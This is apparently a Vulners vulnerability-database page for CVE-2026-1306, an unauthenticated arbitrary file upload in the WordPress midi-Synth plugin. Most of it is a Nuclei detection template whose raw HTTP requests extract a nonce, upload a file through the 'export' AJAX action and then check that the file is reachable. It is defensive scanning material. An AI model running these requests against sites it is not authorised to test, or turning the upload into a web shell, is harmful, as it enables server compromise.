Vulners
Lucene search
WordPress midi-Synth <= 1.1.0 - Unauthenticated Arbitrary File Upload
| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
 | Exploit for CVE-2026-1306 | 28 Apr 202616:27 | – | githubexploit |
 | CVE-2026-1306 | 14 Feb 202606:42 | – | attackerkb |
 | CVE-2026-1306 | 14 Feb 202607:30 | – | circl |
 | WordPress plugin midi-Synth 代码问题漏洞 | 14 Feb 202600:00 | – | cnnvd |
 | CVE-2026-1306 | 14 Feb 202606:42 | – | cve |
 | CVE-2026-1306 midi-Synth <= 1.1.0 - Unauthenticated Arbitrary File Upload via 'export' AJAX Action | 14 Feb 202606:42 | – | cvelist |
 | CVE-2026-1306 | 14 Feb 202607:16 | – | nvd |
 | WordPress midi-Synth plugin <= 1.1.0 - Unauthenticated Arbitrary File Upload via 'export' AJAX Action vulnerability | 15 Feb 202622:12 | – | patchstack |
 | PT-2026-8073 | 14 Feb 202600:00 | – | ptsecurity |
 | CVE-2026-1306 | 15 Feb 202607:10 | – | redhatcve |
10
id: CVE-2026-1306
info:
name: WordPress midi-Synth <= 1.1.0 - Unauthenticated Arbitrary File Upload
author: pussycat0x
severity: critical
description: |
WordPress midi-Synth plugin \u003C= 1.1.0 contains an unrestricted file upload vulnerability caused by missing file type and extension validation in the 'export' AJAX action, letting unauthenticated attackers upload arbitrary files and potentially execute remote code, exploit requires attacker to obtain a valid nonce exposed in frontend JavaScript.
impact: |
Unauthenticated attackers can upload arbitrary files and potentially execute remote code on the server.
remediation: |
Update to the latest version of midi-Synth plugin.
reference:
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/midi-synth/midi-synth-110-unauthenticated-arbitrary-file-upload-via-export-ajax-action
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2026-1306
epss-score: 0.04458
epss-percentile: 0.90218
cwe-id: CWE-434
metadata:
verified: true
max-request: 3
vendor: wordpress
product: midi-synth
framework: wordpress
tags: cve,cve2026,wordpress,wp-plugin,midi-synth,file-upload,rce,intrusive
variables:
randstr: "{{rand_base_string(8)}}"
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Origin: {{BaseURL}}
Referer: {{BaseURL}}/
action=export&nonce={{nonce}}&fileName={{randstr}}.txt&fileMidi={{base64("{{randstr}}")}}
- |
GET /wp-content/plugins/midi-synth/sound/{{randstr}}.txt HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
name: nonce
part: body
internal: true
regex:
- 'var midiSynth_nonce = "([a-z0-9]+)"'
group: 1
matchers:
- type: dsl
dsl:
- status_code_3 == 200
- contains(body_3, "{{randstr}}")
condition: and
# digest: 4a0a0047304502205351e041a04d863fd8c627ade78923fe2e8bfbca2c0e07ff37cad97fc74ed8e60221008bb2156c4cfb859757266cf84a59d9358f0e8cf3d1263e8432511c11e2046e04:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
23 Mar 2026 17:09Current
6Medium risk
Vulners AI Score6
CVSS 3.19.8
EPSS0.04458
SSVC